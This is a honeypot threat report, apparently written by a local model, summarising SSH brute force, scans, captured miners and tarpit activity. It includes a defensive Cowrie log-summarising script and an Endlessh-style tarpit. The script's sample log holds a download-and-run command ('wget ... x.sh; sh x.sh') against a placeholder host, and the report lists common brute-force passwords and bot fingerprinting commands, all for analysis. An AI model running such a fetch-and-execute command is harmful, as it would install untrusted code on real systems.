💀 critical 🤖 qwen2.5:1.5b

Honeypot Threat Analysis — May 12, 2026

Critical threat level — massive coordinated attack activity across all honeypot services.

Tags: ssh-brute-force, honeypot, web-scanning, multi-protocol, high-severity, malware-capture, threat-intelligence

Threat Landscape Overview

Today's picture is dominated by SSH brute force against the Cowrie honeypot: 956 connections and 909 login attempts from 38 unique IP addresses, with 166 commands executed in sessions that got past the login prompt. Roughly 25 connections per source address is the signature of automated credential guessing, not hands-on intrusion.

The multi-protocol honeypot (OpenCanary) logged 3717 events across FTP, Telnet, MySQL, Redis, VNC and Git. Spread over that many services, the volume points to broad port sweeps and credential spraying against every exposed listener rather than a campaign against any one of them.

The HTTP LLM honeypot (Galah, with qwen generating the responses) saw only 87 requests from 25 unique IP addresses: many distinct scanners, each issuing a handful of requests. That profile is mass reconnaissance of the web service, not a sustained attack on it.

The Endlessh SSH tarpit on ports 222/2200/8022/22222 did exactly what it is for: every connection it received (6, from two unique IP addresses, detailed in the tarpit section below) was held in a slow banner exchange that never reaches authentication, costing the scanner time at almost no cost to the Pi. A tarpit is cheap, passive defence; its upkeep is keeping its listening ports clear of real services and checking that trapped clients do not exhaust file descriptors.

Geographic Analysis

The geolocation data puts the majority of attacking addresses in the United States (137 IPs, 25%), Belgium (70 IPs, 12%), France (47 IPs, 8%), Germany (31 IPs, 5%), Netherlands (30 IPs, 5%), China (22 IPs, 4%), Finland (21 IPs, 3%), United Kingdom (14 IPs, 2%) and Vietnam (10 IPs, 1%). Source geolocation says where the attacking hosts sit, not who runs them: these are largely rented VPS and compromised machines, so the spread reflects hosting capacity more than attacker origin.

SSH Brute Force Analysis

The primary activity is credential brute force. The most common passwords tried were "123456", "admin", "123" and "password", almost all against root. Cowrie is configured to accept selected credentials so that a session continues into command execution, which is why "root:admin", "root:@" and "root:root123" appear as successful logins: they tell us which guesses the bots consider worth trying, not that anything real was compromised.

Post-Exploitation Behavior

The TTY sessions show the same short fingerprinting sequence that automated SSH bots run on every host they get into. "uname -s -v -n -r -m" collects kernel, hostname and architecture so the bot can pick a matching payload; "/bin/./uname -s -v -n -r -m" is the same command invoked through an odd path, a trick for dodging shell aliases and simplistic command matching. Neither says anything about privilege: Cowrie sessions already run as the account that logged in, which here was root.

"cat /bin/echo" is not privilege escalation either. Reading a system binary is a cheap honeypot check: a real /bin/echo returns ELF bytes, while an emulated one returns something else, and bots that see the wrong answer disconnect. "echo -n test>/tmp/.config" followed by "cat /tmp/.config" tests that the filesystem is writable and readable before anything is dropped there. The session ends after the checks, so these were fingerprinting runs that decided not to proceed, which is the usual outcome when the emulation is recognised.
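The two sections above are what a daily summary of Cowrie's JSON log boils down to. The following is an added example written for this page, not code from the report or from Cowrie: it parses Cowrie-style JSON events (the eventid, src_ip, session, username, password and input fields are Cowrie's own names), tallies attempted passwords and accepted logins, and labels each session's command list as fingerprint-only, payload-download or other. The log lines are constructed for the example, and the marker strings used for classification are this example's assumption rather than a real classifier.

```python
"""Summarise Cowrie JSON events: attempted passwords, accepted logins and
per-session command sequences, then classify each session."""
import json
from collections import Counter, defaultdict

# Constructed sample of Cowrie JSON log lines for this example (not captured
# data). Field names follow Cowrie's JSON output: eventid, src_ip, session,
# username, password, input.
SAMPLE_LOG = """\
{"eventid":"cowrie.session.connect","src_ip":"203.0.113.10","session":"a1"}
{"eventid":"cowrie.login.failed","src_ip":"203.0.113.10","session":"a1","username":"root","password":"123456"}
{"eventid":"cowrie.login.failed","src_ip":"203.0.113.10","session":"a1","username":"admin","password":"123"}
{"eventid":"cowrie.login.success","src_ip":"203.0.113.10","session":"a1","username":"root","password":"admin"}
{"eventid":"cowrie.command.input","src_ip":"203.0.113.10","session":"a1","input":"uname -s -v -n -r -m"}
{"eventid":"cowrie.command.input","src_ip":"203.0.113.10","session":"a1","input":"/bin/./uname -s -v -n -r -m"}
{"eventid":"cowrie.command.input","src_ip":"203.0.113.10","session":"a1","input":"cat /bin/echo"}
{"eventid":"cowrie.command.input","src_ip":"203.0.113.10","session":"a1","input":"echo -n test>/tmp/.config"}
{"eventid":"cowrie.command.input","src_ip":"203.0.113.10","session":"a1","input":"cat /tmp/.config"}
{"eventid":"cowrie.session.connect","src_ip":"198.51.100.7","session":"b2"}
{"eventid":"cowrie.login.failed","src_ip":"198.51.100.7","session":"b2","username":"root","password":"123456"}
{"eventid":"cowrie.login.failed","src_ip":"198.51.100.7","session":"b2","username":"root","password":"password"}
{"eventid":"cowrie.session.closed","src_ip":"198.51.100.7","session":"b2"}
{"eventid":"cowrie.session.connect","src_ip":"192.0.2.44","session":"c3"}
{"eventid":"cowrie.login.success","src_ip":"192.0.2.44","session":"c3","username":"root","password":"root123"}
{"eventid":"cowrie.command.input","src_ip":"192.0.2.44","session":"c3","input":"cd /tmp; wget http://192.0.2.44/x.sh; sh x.sh"}
"""

# Markers of the bot fingerprinting sequence discussed above. Assumption for
# this example: substring matches, not a real classifier.
FINGERPRINT_MARKERS = ("uname", "cat /bin/echo", "/tmp/.config")
DOWNLOAD_TOOLS = ("wget", "curl", "tftp", "ftpget")


def parse_events(text):
    """Parse one JSON object per line; skip truncated or garbled lines."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events


def summarize(events):
    """Aggregate the counters a daily report quotes."""
    passwords = Counter()
    accepted = Counter()
    commands = defaultdict(list)
    ips = set()
    for ev in events:
        eid = ev.get("eventid", "")
        if "src_ip" in ev:
            ips.add(ev["src_ip"])
        if eid in ("cowrie.login.failed", "cowrie.login.success"):
            passwords[ev["password"]] += 1
        if eid == "cowrie.login.success":
            accepted[f'{ev["username"]}:{ev["password"]}'] += 1
        if eid == "cowrie.command.input":
            commands[ev["session"]].append(ev["input"])
    return {
        "unique_ips": len(ips),
        "top_passwords": passwords.most_common(5),
        "accepted_logins": accepted.most_common(),
        "commands": dict(commands),
    }


def classify_session(cmds):
    """Label a session by what its commands do, not by how many there are."""
    joined = " ; ".join(cmds)
    if any(tool in joined for tool in DOWNLOAD_TOOLS):
        return "payload-download"
    if all(marker in joined for marker in FINGERPRINT_MARKERS):
        return "fingerprint-only"
    return "other"


def report(text):
    """Full summary plus a label per session that ran commands."""
    summary = summarize(parse_events(text))
    summary["session_labels"] = {
        sid: classify_session(cmds) for sid, cmds in summary["commands"].items()
    }
    return summary


if __name__ == "__main__":
    for key, value in report(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

Sessions that only fingerprint (a1) and sessions that fetch a payload (c3) get different labels even though both logged in as root; that distinction, not the raw command count, is what tells you whether a sample is about to land in the malware capture directory.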

Web Scanner Activity

The HTTP requests were reconnaissance rather than exploitation: the root path "/" (also requested against a subdomain hostname), "/login", "/og-default.png" and "/sitemap.xml". Fetching "/" and "/sitemap.xml" maps the site, "/og-default.png" likely probes for a default asset that identifies a particular site template, and "/login" locates an authentication form to try credentials against later. Nothing in this set exploits a vulnerability; it is the inventory stage that precedes targeted payloads.

Malware Captures

Two samples were captured via SSH. The first is classified as a cryptocurrency miner and was flagged by 44 of 74 VirusTotal engines; the IP that uploaded it geolocates to the United States. The second, uploaded from an IP geolocated in China, carries a trojan generator label. A miner dropped after a password brute force is commodity cryptojacking, and nothing in these captures supports espionage or state sponsorship; the value of the samples is their hashes and source IPs, which feed the blocklists and can be correlated with the shared intelligence feeds.

SSH Tarpit (Endlessh)

Endlessh trapped 6 connections from two unique IP addresses. Every client that reached the tarpit was held there, so these are not bypasses: the low count reflects that most scanners go for port 22, where Cowrie answers, and only a few probe the alternate ports. Even scanners that hang up quickly are worth it, because each trapped socket costs the Pi almost nothing while the client waits for a banner that never turns into a version string.
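As an added illustration of what the tarpit does (example code written for this page, not Endlessh's source): a minimal SSH tarpit that accepts a connection and sends a short random line every `delay` seconds without ever sending the "SSH-" identification string. RFC 4253 allows such lines before the identification string, so a scanner's SSH library keeps reading and waiting. The Tarpit class, the probe() client and the timing measurement are this example's additions; the 10-second default delay and 32-byte line limit mirror Endlessh's defaults.

```python
"""Minimal Endlessh-style SSH tarpit (example for this page, not Endlessh's
own code): hold clients in the pre-identification-string phase indefinitely."""
import random
import socket
import threading
import time

# RFC 4253 section 4.2 lets a server send lines before its identification
# string as long as they do not begin with "SSH-" and end with CRLF. Clients
# keep reading, waiting for a line that starts with "SSH-", which never comes.
CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789"


def banner_line(rng, max_len=32):
    """One harmless prelude line. The charset has no uppercase letters and
    no '-', so a line can never start with "SSH-"."""
    n = rng.randint(3, max_len - 2)  # leave room for the CRLF
    return "".join(rng.choice(CHARSET) for _ in range(n)).encode() + b"\r\n"


def is_valid_prelude(line):
    """Check a line obeys the rule the tarpit relies on."""
    return line.endswith(b"\r\n") and not line.startswith(b"SSH-") and len(line) <= 255


def serve_client(conn, delay, rng, stop):
    """Drip one line every `delay` seconds until the client gives up."""
    try:
        while not stop.is_set():
            conn.sendall(banner_line(rng))
            time.sleep(delay)
    except OSError:
        pass  # client disconnected: it spent its time, we spent almost none
    finally:
        conn.close()


class Tarpit:
    def __init__(self, host="127.0.0.1", port=0, delay=10.0, seed=None):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((host, port))  # port 0 picks a free port
        self.sock.listen(64)
        self.sock.settimeout(0.2)     # lets the accept loop notice stop
        self.port = self.sock.getsockname()[1]
        self.delay = delay
        self.rng = random.Random(seed)
        self.stop = threading.Event()
        self.trapped = 0              # connections that reached the tarpit
        self.thread = threading.Thread(target=self._accept_loop, daemon=True)

    def start(self):
        self.thread.start()
        return self

    def _accept_loop(self):
        while not self.stop.is_set():
            try:
                conn, _addr = self.sock.accept()
            except socket.timeout:
                continue
            except OSError:
                break
            self.trapped += 1
            client_rng = random.Random(self.rng.random())
            threading.Thread(target=serve_client,
                             args=(conn, self.delay, client_rng, self.stop),
                             daemon=True).start()

    def close(self):
        self.stop.set()
        self.thread.join(timeout=2)
        self.sock.close()


def probe(port, lines=3, timeout=5.0):
    """Behave like an SSH client reading the prelude: measure how long it
    takes to receive `lines` lines and return (seconds_held, lines)."""
    start = time.monotonic()
    buf = b""
    with socket.create_connection(("127.0.0.1", port), timeout=timeout) as s:
        while buf.count(b"\r\n") < lines:
            chunk = s.recv(1024)
            if not chunk:
                break
            buf += chunk
    got = [part + b"\r\n" for part in buf.split(b"\r\n")[:lines]]
    return time.monotonic() - start, got


if __name__ == "__main__":
    # Stand-alone: run a tarpit on 2222 with the 10 s delay and wait forever.
    Tarpit(port=2222, delay=10.0).start().thread.join()
```

Run with a short delay, probe() shows the asymmetry the tarpit exploits: the client is held for (lines - 1) * delay seconds to receive a few dozen bytes, while the server holds one idle socket and wakes once per delay. With the real 10-second delay the trapped connections in today's report represent minutes of scanner time per connection.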

Canarytoken Alerts

The 17 canarytoken alerts are callbacks from the decoy credentials planted on the honeypot: fake AWS access keys and SSH keys that have no legitimate use, so any request that presents them is, by construction, an attacker who found the file and tried the contents. Because a token fires wherever it is used, the alert source is frequently a different host than the one that pulled the file, which both confirms that the credentials were exfiltrated and yields another IP for the blocklists. This is why the decoys are worth planting: they turn a silent file read into a high-confidence alert.

Community Defense

All reported IPs are shared with AbuseIPDB, AlienVault OTX, Blocklist.de, and SANS DShield for further investigation and mitigation. The malware samples have been submitted to VirusTotal and OTX, providing valuable data for threat hunting and response strategies.

Honeypot Infrastructure

The honeypot infrastructure is maintained on a Raspberry Pi 5 in Spain using an open-source approach, ensuring flexibility and adaptability based on the evolving nature of cybersecurity threats.


This analysis was generated by qwen2.5:1.5b running locally on the Raspberry Pi 5 honeypot lab. All data comes from real attacks captured in the last 24 hours. View the raw data report for complete metrics.